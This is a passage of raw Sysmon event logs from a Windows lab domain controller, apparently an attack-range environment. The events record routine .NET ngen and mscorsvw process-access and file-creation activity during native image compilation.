t.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.742","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-001080C00A00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6756,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.742\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-001080C00A00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.742","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-001080C00A00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6757,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.742\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-001080C00A00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-001080C00A00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6758,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.820\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-001012C40A00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.820","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-001012C40A00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6759,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.820\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-001012C40A00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.820","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-001012C40A00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.820\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-001012C40A00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.820","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-001012C40A00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:15.007\r\nProcessGuid: {41C8662E-21FC-5F25-0000-001012C40A00}\r\nProcessId: 4328\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e8-0\\System.Runtime.Serialization.dll\r\nCreationUtcTime: 2020-08-01 08:04:15.007","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:15.007","ProcessGuid":"{41C8662E-21FC-5F25-0000-001012C40A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e8-0\\System.Runtime.Serialization.dll","CreationUtcTime":"2020-08-01 08:04:15.007","EventReceivedTime":"2020-08-01 08:04:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:15.086\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FF-5F25-0000-0010FBC90A00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:15.086","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FF-5F25-0000-0010FBC90A00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:15.086\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FF-5F25-0000-0010FBC90A00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:15.086","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FF-5F25-0000-0010FBC90A00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:15.086\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FF-5F25-0000-0010FBC90A00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 